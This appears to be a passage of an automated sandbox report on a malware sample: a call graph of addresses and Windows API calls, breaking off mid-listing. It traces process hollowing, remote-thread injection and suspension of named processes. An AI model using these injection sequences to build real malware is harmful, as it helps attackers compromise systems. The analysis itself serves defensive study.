18491->18492 18492->18024 18493->18490 18494 2524958 CreateProcessA 18493->18494 18494->18490 18495 2524966 GetThreadContext 18494->18495 18495->18490 18496 2524988 ReadProcessMemory 18495->18496 18497 25249b8 NtUnmapViewOfSection 18496->18497 18498 2524a1f VirtualAllocEx 18496->18498 18500 25249d0 VirtualAllocEx 18497->18500 18501 25249fb VirtualAllocEx 18497->18501 18499 2524a48 18498->18499 18499->18490 18923 25247b4 18499->18923 18500->18499 18501->18499 18503 2524ab6 WriteProcessMemory SetThreadContext ResumeThread 18504 2512c5c 11 API calls 18503->18504 18504->18490 18505 2524a5c 18505->18503 18507 2514d64 18506->18507 18508 25182d4 CreateDirectoryA 18507->18508 18508->17746 18510 2514f90 11 API calls 18509->18510 18511 2525558 18510->18511 18512 2525579 18511->18512 18513 2514dbc 11 API calls 18511->18513 18512->17949 18513->18511 18926 25152d4 18514->18926 18516 2524f4e VirtualAlloc VirtualAlloc 18928 2512dc8 18516->18928 18518 2524fc6 VirtualProtect 18519 252505e 18518->18519 18523 2524ff7 18518->18523 18520 2515a04 16 API calls 18519->18520 18521 2525085 18520->18521 18526 25250b5 18521->18526 18930 2524de8 18521->18930 18522 252501c VirtualAlloc 18522->18523 18523->18519 18523->18522 18525 25250f1 18528 2515398 13 API calls 18525->18528 18526->18525 18527 25250d8 VirtualProtect 18526->18527 18527->18525 18527->18526 18529 2525140 18528->18529 18529->17993 18531 2524655 OpenProcess NtSuspendProcess 18530->18531 18532 2524615 Process32First 18530->18532 18531->18058 18533 2524627 lstrcmpiA 18532->18533 18534 252464d CloseHandle 18532->18534 18535 2524642 Process32Next 18533->18535 18536 2524636 CloseHandle 18533->18536 18534->18531 18535->18533 18535->18534 18536->18531 18538 2523fd8 VirtualAlloc 18537->18538 18539 2524037 18538->18539 18540 2524005 VirtualFree VirtualAllocEx 18538->18540 18539->18538 18541 2524044 18539->18541 18540->18539 18986 25243f8 18541->18986 18544 25155fc 16 API calls 18545 2524067 18544->18545 18546 2524070 WriteProcessMemory 18545->18546 18547 25240ac 18545->18547 19004 2523ddc 18546->19004 18549 2515398 13 API calls 18547->18549 18550 25240d9 18549->18550 18550->18091 18563 2514d64 18551->18563 18554 251cafe 18554->18274 18554->18277 18557 25148ca 18555->18557 18556 25148f0 18556->17378 18557->18556 18558 2512c5c 11 API calls 18557->18558 18558->18557 18560 25236ac 18559->18560 18565 252365c VirtualProtect 18560->18565 18564 2514d68 LoadLibraryA 18563->18564 18564->18554 18566 2523674 18565->18566 18567 252369a 18565->18567 18568 2523680 GetCurrentProcess FlushInstructionCache VirtualProtect 18566->18568 18567->18276 18568->18567 18570 2514964 11 API calls 18569->18570 18571 25149a0 18570->18571 18572 25148a0 11 API calls 18571->18572 18573 25149b8 18572->18573 18573->18306 18576 2512edb 18574->18576 18575 2512ed3 CharNextA 18575->18576 18576->18575 18577 2512ef5 18576->18577 18578 2512f49 18577->18578 18579 2512f01 CharNextA 18577->18579 18580 2512f34 CharNextA 18577->18580 18582 2512f0b CharNextA 18577->18582 18583 2512f2a CharNextA 18577->18583 18581 2514f90 11 API calls 18578->18581 18579->18577 18580->18577 18587 2512f52 18581->18587 18582->18577 18583->18577 18584 2512fba 18584->18305 18585 2512f60 CharNextA 18585->18587 18586 2512f9c CharNextA 18586->18587 18587->18584 18587->18585 18587->18586 18588 2512f6a CharNextA 18587->18588 18589 2512f92 CharNextA 18587->18589 18588->18587 18589->18587 18591 25135f3 18590->18591 18592 2513608 18590->18592 18591->18592 18593 251369e 18591->18593 18603 2512d48 18591->18603 18594 2513685 GetStdHandle 18592->18594 18600 2513625 CreateFileA 18592->18600 18597 2512d48 4 API calls 18593->18597 18598 251367c 18594->18598 18599 2513681 18597->18599 18598->18599 18601 25136a5 GetLastError 18598->18601 18599->18326 18600->18598 18601->18593 18604 251676c 4 API calls 18603->18604 18605 2512d50 18604->18605 18605->18592 18607 2512d48 4 API calls 18606->18607 18608 2512d62 18607->18608 18608->18335 18610 2513438 18609->18610 18611 25133de ReadFile 18609->18611 18612 2512d48 4 API calls 18610->18612 18613 25133f5 GetLastError 18611->18613 18616 2513406 18611->18616 18614 25133ff 18612->18614 18615 2512d48 4 API calls 18613->18615 18614->17610 18615->18614 18616->18614 18617 2512d48 4 API calls 18616->18617 18617->18614 18626 2515878 18618->18626 18745 2514db4 18621->18745 18623 2514e48 18623->18362 18624 2514e12 18624->18623 18625 2514f90 11 API calls 18624->18625 18625->18623 18627 2515897 18626->18627 18632 25158b1 18626->18632 18628 25158a2 18627->18628 18643 2512d1c 18627->18643 18649 2515870 18628->18649 18631 25158ac 18631->18362 18633 25158fa 18632->18633 18634 2512d1c 11 API calls 18632->18634 18635 2515907 18633->18635 18636 251593c 18633->18636 18634->18633 18637 2512c74 11 API calls 18635->18637 18638 2512c40 11 API calls 18636->18638 18640 2515937 18637->18640 18639 2515946 18638->18639 18639->18640 18652 2515858 18639->18652 18640->18631 18642 2515878 16 API calls 18640->18642 18642->18640 18644 2512cd0 18643->18644 18645 2512cf5 18644->18645 18646 251676c 4 API calls 18644->18646 18647 2512cc4 7 API calls 18645->18647 18646->18645 18648 2512d16 18647->18648 18648->18628 18655 2515a10 18649->18655 18702 2515718 18652->18702 18654 2515863 18654->18640 18656 2515a16 18655->18656 18659 2515875 18655->18659 18657 2515a40 18656->18657 18656->18659 18661 25153e4 18656->18661 18658 2512c5c 11 API calls 18657->18658 18658->18659 18659->18631 18662 25153ed 18661->18662 18682 2515422 18661->18682 18663 2515402 18662->18663 18664 2515427 18662->18664 18665 2515444 18663->18665 18666 2515406 18663->18666 18667 2515438 18664->18667 18668 251542e 18664->18668 18670 2515452 18665->18670 18671 251544b 18665->18671 18672 251545b 18666->18672 18673 251540a 18666->18673 18669 25148c4 11 API calls 18667->18669 18674 25148a0 11 API calls 18668->18674 18669->18682 18689 251503c 18670->18689 18686 2515024 18671->18686 18672->18682 18693 25153cc 18672->18693 18677 251546a 18673->18677 18678 251540e 18673->18678 18674->18682 18681 25153e4 13 API calls 18677->18681 18677->18682 18680 2515488 18678->18680 18685 2515412 18678->18685 18680->18682 18698 2515398 18680->18698 18681->18677 18682->18657 18684 2515a10 13 API calls 18684->18685 18685->18682 18685->18684 18687 2515038 18686->18687 18688 251502a SysFreeString 18686->18688 18687->18682 18688->18687 18690 2515042 18689->18690 18691 2515048 SysFreeString 18690->18691 18692 251505a 18690->18692 18691->18690 18692->18682 18694 25153d5 18693->18694 18695 25153dc 18693->18695 18694->18672 18696 2512d1c 11 API calls 18695->18696 18697 25153e3 18696->18697 18697->18672 18699 25153aa 18698->18699 18700 25153e4 13 API calls 18699->18700 18701 25153c3 18699->18701 18700->18699 18701->18680 18703 251572d 18702->18703 18718 2515753 18702->18718 18705 2515732 18703->18705 18706 2515775 18703->18706 18704 25148f4 11 API calls 18704->18718 18707 2515737 18705->18707 18711 2515789 18705->18711 18715 2515770 18706->18715 18721 2515060 18706->18721 18709 251573c 18707->18709 18714 251579d 18707->18714 18712 2515741 18709->18712 18713 25157be 18709->18713 18711->18715 18731 25155e4 18711->18731 18712->18715 18712->18718 18719 25157ef 18712->18719 18713->18715 18736 25155fc 18713->18736 18714->18715 18716 2515718 16 API calls 18714->18716 18715->18654 18716->18714 18718->18704 18718->18715 18719->18715 18720 2515a4c 13 API calls 18719->18720 18720->18719 18722 2515064 18721->18722 18723 2515087 18721->18723 18724 2515024 18722->18724 18727 2515077 SysReAllocStringLen 18722->18727 18723->18706 18725 2515038 18724->18725 18726 251502a SysFreeString 18724->18726 18725->18706 18726->18725 18727->18723 18728 2514ff4 18727->18728 18729 25152d0 18728->18729 18730 25152ba SysAllocStringLen 18728->18730 18729->18706 18730->18728 18730->18729 18732 25155f4 18731->18732 18735 25155ed 18731->18735 18733 2512d1c 11 API calls 18732->18733 18734 25155fb 18733->18734 18734->18711 18735->18711 18743 2515616 18736->18743 18737 25148f4 11 API calls 18737->18743 18738 2515060 3 API calls 18738->18743 18739 25155e4 11 API calls 18739->18743 18740 2515702 18740->18713 18741 2515718 16 API calls 18741->18743 18742 25155fc 16 API calls 18742->18743 18743->18737 18743->18738 18743->18739 18743->18740 18743->18741 18743->18742 18744 2515a4c 13 API calls 18743->18744 18744->18743 18746 2514d70 18745->18746 18747 2514dab 18746->18747 18748 2514964 11 API calls 18746->18748 18747->18624 18749 2514d87 18748->18749 18749->18747 18750 2512c5c 11 API calls 18749->18750 18750->18747 18752 2514990 11 API calls 18751->18752 18753 2514a95 18752->18753 18753->18371 18755 2514b70 18754->18755 18756 2514baf 18754->18756 18757 25148f4 18755->18757 18758 2514b7a 18755->18758 18756->18371 18764 2514964 11 API calls 18757->18764 18765 2514908 18757->18765 18759 2514ba4 18758->18759 18760 2514b8d 18758->18760 18761 2514f90 11 API calls 18759->18761 18763 2514f90 11 API calls 18760->18763 18767 2514b92 18761->18767 18762 2514936 18762->18371 18763->18767 18764->18765 18765->18762 18766 2512c5c 11 API calls 18765->18766 18766->18762 18767->18371 18769 2517bd2 18768->18769 18770 2517bf0 18769->18770 18771 2517bf9 18769->18771 18772 25148a0 11 API calls 18770->18772 18774 2514dc4 11 API calls 18771->18774 18773 2517bf7 18772->18773 18773->18410 18774->18773 18777 251493c 18775->18777 18776 2514960 18776->18449 18777->18776 18778 2512c5c 11 API calls 18777->18778 18778->18776 18780 2522a0d 18779->18780 18785 2522a48 18780->18785 18782 2522a29 18782->18468 18784 25180b1 18783->18784 18784->18469 18786 2522a63 18785->18786 18787 2522a8a 18786->18787 18788 2522b08 18786->18788 18790 2522aa3 CreateFileA 18787->18790 18828 2518010 18788->18828 18791 2522ab4 18790->18791 18792 2522b01 18791->18792 18809 2518218 18791->18809 18795 25148f4 11 API calls 18792->18795 18793 2522b12 18793->18792 18796 2518218 12 API calls 18793->18796 18799 2522b75 18795->18799 18797 2522b2d GetLastError 18796->18797 18800 251a984 12 API calls 18797->18800 18804 25148c4 11 API calls 18799->18804 18802 2522b44 18800->18802 18805 251b290 42 API calls 18802->18805 18807 2522b8f 18804->18807 18808 2522b66 18805->18808 18807->18782 18808->18792 18810 2518236 GetFullPathNameA 18809->18810 18811 2514d64 18809->18811 18812 2514990 11 API calls 18810->18812 18811->18810 18813 2518249 GetLastError 18812->18813 18814 251a984 FormatMessageA 18813->18814 18815 251a9aa 18814->18815 18816 2514990 11 API calls 18815->18816 18817 251a9c8 18816->18817 18818 251b290 18817->18818 18819 251b29e 18818->18819 18832 251659c 18819->18832 18821 251b2c8 18838 251886c 18821->18838 18824 25148f4 11 API calls 18825 251b2e1 18824->18825 18826 25148c4 11 API calls 18825->18826 18827 251b2fb 18826->18827 18827->18792 18829 2518063 18828->18829 18830 2518024 18828->18830 18829->18793 18830->18829 18831 251805d CreateFileA 18830->18831 18831->18829 18833 25165ad 18832->18833 18834 25165de 18832->18834 18833->18834 18841 2515af0 18833->18841 18834->18821 18837 2514990 11 API calls 18837->18834 18884 2518880 18838->18884 18842 2515b15 LoadStringA 18841->18842 18843 2515aff 18841->18843 18842->18837 18843->18842 18845 2515aa8 18843->18845 18846 2515ad4 18845->18846 18847 2515ab8 GetModuleFileNameA 18845->18847 18846->18842 18849 2515d0c GetModuleFileNameA RegOpenKeyExA 18847->18849 18850 2515d8f 18849->18850 18851 2515d4f RegOpenKeyExA 18849->18851 18867 2515b48 GetModuleHandleA 18850->18867 18851->18850 18852 2515d6d RegOpenKeyExA 18851->18852 18852->18850 18854 2515e18 lstrcpynA GetThreadLocale GetLocaleInfoA 18852->18854 18856 2515f32 18854->18856 18857 2515e4f 18854->18857 18856->18846 18857->18856 18860 2515e5f lstrlenA 18857->18860 18858 2515dd4 RegQueryValueExA 18859 2515df2 RegCloseKey 18858->18859 18859->18846 18862 2515e77 18860->18862 18862->18856 18863 2515ec4 18862->18863 18864 2515e9c lstrcpynA LoadLibraryExA 18862->18864 18863->18856 18865 2515ece lstrcpynA LoadLibraryExA 18863->18865 18864->18863 18865->18856 18866 2515f00 lstrcpynA LoadLibraryExA 18865->18866 18866->18856 18868 2515b73 GetProcAddress 18867->18868 18869 2515bb6 18867->18869 18868->18869 18870 2515b87 18868->18870 18872 2515cde RegQueryValueExA 18869->18872 18873 2515b28 CharNextA 18869->18873 18880 2515be9 18869->18880 18870->18869 18874 2515b9d lstrcpynA 18870->18874 18871 2515bfc lstrcpynA 18879 2515c1a 18871->18879 18872->18858 18872->18859 18876 2515bd6 18873->18876 18874->18872 18875 2515cca lstrcpynA 18875->18872 18876->18872 18878 2515b28 CharNextA 18876->18878 18877 2515b28 CharNextA 18877->18879 18878->18880 18879->18872 18879->18875 18879->18877 18881 2515c36 lstrcpynA FindFirstFileA 18879->18881 18880->18871 18880->18872 18881->18872 18882 2515c67 FindClose lstrlenA 18881->18882 18882->18872 18883 2515c89 lstrcpynA lstrlenA 18882->18883 18883->18879 18885 25188a6 18884->18885 18887 25188d9 18885->18887 18897 25184b4 18885->18897 18888 2518943 18887->18888 18895 25188f6 18887->18895 18889 2514990 11 API calls 18888->18889 18891 251887b 18889->18891 18890 2518937 18892 2514f90 11 API calls 18890->18892 18891->18824 18892->18891 18893 25148a0 11 API calls 18893->18895 18894 2514f90 11 API calls 18894->18895 18895->18890 18895->18893 18895->18894 18896 25184b4 11 API calls 18895->18896 18896->18895 18901 25184dd 18897->18901 18898 25184ee 18915 251880b 18898->18915 18901->18898 18902 2518596 11 API calls 18901->18902 18905 25185de 18901->18905 18912 25184a8 18901->18912 18902->18901 18906 25185ef 18905->18906 18909 2518649 18905->18909 18908 25186e7 18906->18908 18906->18909 18907 251880b 11 API calls 18907->18909 18911 2517c18 18908->18911 18918 2518484 18908->18918 18909->18907 18909->18911 18911->18901 18913 25148a0 11 API calls 18912->18913 18914 25184b2 18913->18914 18914->18901 18916 25148a0 11 API calls 18915->18916 18917 2518818 18916->18917 18917->18887 18919 2518490 18918->18919 18920 251849c 18918->18920 18919->18911 18921 2512d1c 11 API calls 18920->18921 18922 25184a3 18921->18922 18922->18911 18924 2512c40 11 API calls 18923->18924 18925 25247ea 18924->18925 18925->18505 18927 25152e6 18926->18927 18927->18516 18929 2512dcc 18928->18929 18929->18518 18929->18929 18936 2524e12 18930->18936 18931 2524f0b 18932 25148c4 11 API calls 18931->18932 18933 2524f25 18932->18933 18933->18526 18935 251cab0 2 API calls 18935->18936 18936->18931 18936->18935 18938 2524ed6 GetProcAddress 18936->18938 18939 2524ec4 GetProcAddress 18936->18939 18940 2524c58 18936->18940 18950 2524bc8 18936->18950 18938->18936 18939->18936 18941 2524c67 18940->18941 18941->18941 18960 2515524 18941->18960 18943 2524cde 18944 25148a0 11 API calls 18943->18944 18945 2524cf3 18944->18945 18947 25153e4 13 API calls 18945->18947 18946 2524c8b 18946->18943 18948 2524cc4 lstrcmpiA 18946->18948 18949 2524d05 18947->18949 18948->18946 18949->18936 18951 2524bdc 18950->18951 18952 2515a04 16 API calls 18951->18952 18953 2524c0f 18952->18953 18954 25148f4 11 API calls 18953->18954 18955 2524c29 18954->18955 18956 25148a0 11 API calls 18955->18956 18957 2524c3e 18956->18957 18958 2515a10 13 API calls 18957->18958 18959 2524c4c 18958->18959 18959->18936 18961 251552f 18960->18961 18962 2515550 18960->18962 18961->18962 18963 2515571 18961->18963 18964 2515544 18961->18964 18962->18946 18963->18962 18973 25152b4 18963->18973 18966 2515548 18964->18966 18969 2515580 18964->18969 18968 251558f 18966->18968 18972 251554c 18966->18972 18968->18962 18970 2515524 12 API calls 18968->18970 18969->18962 18977 251550c 18969->18977 18970->18968 18972->18962 18982 25154dc 18972->18982 18974 25152d0 18973->18974 18975 25152ba SysAllocStringLen 18973->18975 18974->18963 18975->18974 18976 2514ff4 18975->18976 18976->18973 18978 2515515 18977->18978 18979 251551c 18977->18979 18978->18969 18980 2512d1c 11 API calls 18979->18980 18981 2515523 18980->18981 18981->18969 18984 25154ee 18982->18984 18983 2515524 12 API calls 18983->18984 18984->18983 18985 2515507 18984->18985 18985->18972 18987 25152d4 18986->18987 18988 2524417 VirtualAlloc VirtualAlloc 18987->18988 18989 2512dc8 18988->18989 18990 252447f VirtualProtect 18989->18990 18991 25244b0 18990->18991 18992 2524517 18990->18992 18991->18992 18994 25244d5 VirtualAlloc 18991->18994 18993 2515a04 16 API calls 18992->18993 18995 252454d 18993->18995 18994->18991 18998 252457d 18995->18998 19011 252429c 18995->19011 18997 25245b9 18999 25155fc 16 API calls 18997->18999 18998->18997 19001 25245a0 VirtualProtect 18998->19001 19000 25245ca 18999->19000 19002 2515398 13 API calls 19000->19002 19001->18997 19001->18998 19003 2524054 19002->19003 19003->18544 19044 2523dac VirtualAllocEx WriteProcessMemory 19004->19044 19006 2523df4 19045 2523dac VirtualAllocEx WriteProcessMemory 19006->19045 19008 2523e0b CreateRemoteThread 19009 2523e55 19008->19009 19010 2523e35 WaitForSingleObjectEx ReadProcessMemory 19008->19010 19009->18547 19010->19009 19017 25242c6 19011->19017 19012 25243cc 19013 25148c4 11 API calls 19012->19013 19014 25243e6 19013->19014 19014->18998 19017->19012 19019 252411c 26 API calls 19017->19019 19020 252392c 19017->19020 19030 2523e60 VirtualAllocEx 19017->19030 19034 252389c 19017->19034 19019->19017 19021 252393b 19020->19021 19022 2515524 12 API calls 19021->19022 19023 252395f 19022->19023 19024 25239b2 19023->19024 19029 2523998 lstrcmpiA 19023->19029 19025 25148a0 11 API calls 19024->19025 19026 25239c7 19025->19026 19027 25153e4 13 API calls 19026->19027 19028 25239d9 19027->19028 19028->19017 19029->19023 19031 2523f32 19030->19031 19032 2523e8f 6 API calls 19030->19032 19031->19017 19032->19031 19033 2523f2a CloseHandle 19032->19033 19033->19031 19035 25238b0 19034->19035 19036 2515a04 16 API calls 19035->19036 19037 25238e3 19036->19037 19038 25148f4 11 API calls 19037->19038 19039 25238fd 19038->19039 19040 25148a0 11 API calls 19039->19040 19041 2523912 19040->19041 19042 2515a10 13 API calls 19041->19042 19043 2523920 19042->19043 19043->19017 19044->19006 19045->19008 19046 251cb27 19047 251cb18 SetErrorMode 19046->19047 19048 2511c9c 19049 2511d34 19048->19049 19050 2511cac 19048->19050 19053 2511f88 19049->19053 19054 2511d3d 19049->19054 19051 2511cf0 19050->19051 19052 2511cb9 19050->19052 19058 2511754 10 API calls 19051->19058 19055 2511cc4 19052->19055 19096 2511754 19052->19096 19056 251201c 19053->19056 19060 2511f98 19053->19060 19061 2511fdc 19053->19061 19057 2511d55 19054->19057 19071 2511e54 19054->19071 19063 2511d5c 19057->19063 19067 2511d78 19057->19067 19072 2511e2c 19057->19072 19080 2511d07 19058->19080 19065 2511754 10 API calls 19060->19065 19064 2511fe2 19061->19064 19068 2511754 10 API calls 19061->19068 19062 2511eac 19066 2511754 10 API calls 19062->19066 19082 2511ec5 19062->19082 19070 2511fb2 19065->19070 19084 2511f5c 19066->19084 19073 2511da9 Sleep 19067->19073 19086 2511dcc 19067->19086 19074 2511ff1 19068->19074 19069 2511ce9 19089 2511abc 8 API calls 19070->19089 19093 2511fd7 19070->19093 19071->19062 19076 2511e85 Sleep 19071->19076 19071->19082 19075 2511754 10 API calls 19072->19075 19077 2511dc1 Sleep 19073->19077 19073->19086 19090 2511abc 8 API calls 19074->19090 19074->19093 19079 2511e35 19075->19079 19076->19062 19081 2511e9f Sleep 19076->19081 19077->19067 19078 2511cd1 19078->19069 19120 2511abc 19078->19120 19092 2511abc 8 API calls 19079->19092 19095 2511e4d 19079->19095 19085 2511abc 8 API calls 19080->19085 19087 2511d2d 19080->19087 19081->19071 19084->19082 19088 2511abc 8 API calls 19084->19088 19085->19087 19091 2511f80 19088->19091 19089->19093 19094 2512014 19090->19094 19092->19095 19097 2511998 19096->19097 19098 251176c 19096->19098 19099 2511ab0 19097->19099 19100 2511968 19097->19100 19109 25117fb Sleep 19098->19109 19110 251177e 19098->19110 19102 25116b4 VirtualAlloc 19099->19102 19103 2511ab9 19099->19103 19104 2511977 Sleep 19100->19104 19113 25119b6 19100->19113 19101 251178d 19101->19078 19105 25116ef 19102->19105 19106 25116df 19102->19106 19103->19078 19107 251198d Sleep 19104->19107 19104->19113 19105->19078 19137 2511674 19106->19137 19107->19100 19109->19110 19112 2511814 Sleep 19109->19112 19110->19101 19111 251185c 19110->19111 19114 251183a Sleep 19110->19114 19119 2511868 19111->19119 19143 25115fc 19111->19143 19112->19098 19115 25115fc VirtualAlloc 19113->19115 19117 25119d4 19113->19117 19114->19111 19116 2511850 Sleep 19114->19116 19115->19117 19116->19110 19117->19078 19119->19078 19121 2511ad1 19120->19121 19122 2511b9c 19120->19122 19124 2511ad7 19121->19124 19127 2511b43 Sleep 19121->19127 19122->19124 19126 2511718 19122->19126 19123 2511ae0 19123->19069 19124->19123 19128 2511b7b Sleep 19124->19128 19134 2511bb1 19124->19134 19125 2511c96 19125->19069 19126->19125 19129 2511674 2 API calls 19126->19129 19127->19124 19130 2511b5d Sleep 19127->19130 19131 2511b91 Sleep 19128->19131 19128->19134 19132 2511725 VirtualFree 19129->19132 19130->19121 19131->19124 19133 251173d 19132->19133 19133->19069 19135 2511c30 VirtualFree 19134->19135 19136 2511bd4 19134->19136 19135->19069 19136->19069 19138 25116b1 19137->19138 19139 251167d 19137->19139 19138->19105 19139->19138 19140 251167f Sleep 19139->19140 19141 2511694 19140->19141 19141->19138 19142 2511698 Sleep 19141->19142 19142->19139 19147 2511590 19143->19147 19145 2511604 VirtualAlloc 19146 251161b 19145->19146 19146->19119 19148 2511530 19147->19148 19148->19145 19149 252c2ac 19159 25167b8 19149->19159 19155 252c2e5 19156 252c2f3 GetMessageA 19155->19156 19157 252c2e7 TranslateMessage DispatchMessageA 19156->19157 19158 252c303 19156->19158 19157->19156 19160 25167c3 19159->19160 19168 251455c 19160->19168 19163 2514670 19164 2514677 19163->19164 19165 2515060 3 API calls 19164->19165 19166 2514687 19164->19166 19165->19164 19167 252b0cc timeSetEvent 19166->19167 19167->19155 19169 25145a2 19168->19169 19170 251461b 19169->19170 19171 25147ac 19169->19171 19182 25144f4 19170->19182 19173 25147dd 19171->19173 19177 25147ee 19171->19177 19175 2514720 5 API calls 19173->19175 19176 25147e7 19175->19176 19176->19177 19178 2514833 FreeLibrary 19177->19178 19179 2514857 19177->19179 19178->19177 19180 2514860 19179->19180 19181 2514866 ExitProcess 19179->19181 19180->19181 19183 2514537 19182->19183 19184 2514504 19182->19184 19183->19163 19184->19183 19185 2515aa8 30 API calls 19184->19185 19186 25115fc VirtualAlloc 19184->19186 19185->19184 19186->19184

                                                                Executed Functions

                                                                Function 02525DE4 Relevance: 183.9, APIs: 7, Strings: 96, Instructions: 3639sleepfileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 2525de4-2525de7 1 2525dec-2525df1 0->1 1->1 2 2525df3-2525e0e call 251304c 1->2 5 2525e14-25267b2 call 2513024 call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 251304c 2->5 6 252a7b8 2->6 305 25267b4-25267c3 call 25148f4 5->305 306 25267c5-25267cf call 25148f4 5->306 310 25267d4-2526a01 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2517da0 call 2512fc4 call 25181e0 call 25148f4 305->310 306->310 375 2526a03-2526a06 310->375 376 2526a08-2526aa6 call 2514dc4 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2518110 310->376 375->376 395 2526bb9-2526d1a call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2517da0 call 2512fc4 call 2513300 call 25136bc call 2512d28 call 25134cc call 2512d28 call 2514f90 376->395 396 2526aac-2526b7f call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2513300 call 25136bc call 2512d28 call 25134cc call 2512d28 call 2514f90 376->396 487 2526d21-2526dc5 call 2514dbc call 2513454 call 2512d28 call 2513474 call 2512d28 call 2525300 call 2515a4c call 25148f4 call 2517da0 call 2525b34 call 25148f4 call 252521c 395->487 488 2526d1c-2526d1f 395->488 450 2526b81-2526b84 396->450 451 2526b86-2526bb4 call 2514dbc call 2513454 call 2512d28 call 2513474 call 2512d28 396->451 450->451 472 2526fdb-25271dc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 25148f4 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 25258b0 451->472 472->6 622 25271e2-252752d call 2517da0 call 2525bdc call 25148f4 call 2525ac0 call 25148f4 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514b28 call 2525300 call 2515a4c call 25148f4 * 9 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 25148f4 call 2514d64 call 2514a98 call 2518134 472->622 538 2526dcb-2526e23 call 2525974 call 25148f4 Sleep call 2514a98 * 2 call 25236cc 487->538 539 2526e8e-2526e93 call 25258b0 487->539 488->487 568 2526e28-2526e89 call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc 538->568 544 2526e98-2526e9a 539->544 544->472 547 2526ea0-2526f16 call 2525300 call 2515a4c call 25148f4 call 2517da0 call 2525b34 call 25148f4 call 252521c 544->547 592 2526f38-2526fd6 Sleep call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc 547->592 593 2526f18-2526f33 call 2525974 call 25148f4 547->593 568->539 592->472 593->592 727 2527551-2527564 622->727 728 252752f-252754c call 2514d64 call 2514a98 call 25182c8 622->728 729 2527566-2527569 727->729 730 252756b-252760c call 2514dc4 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514cb0 727->730 728->727 729->730 754 2527612-252766d call 2525ac0 call 2514c24 call 2514d64 call 2514a98 call 2518110 730->754 755 2527cbb-2527e35 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514cb0 730->755 754->755 776 2527673-25277ab call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2518110 754->776 845 2528baa-2529004 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2525580 call 25148f4 call 2517da0 call 2525b34 call 25148f4 call 2525ac0 call 2525910 call 25148f4 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 